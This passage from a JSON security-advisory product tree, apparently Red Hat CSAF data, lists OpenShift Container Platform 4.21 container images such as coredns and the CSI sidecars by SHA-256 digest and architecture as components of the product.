"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
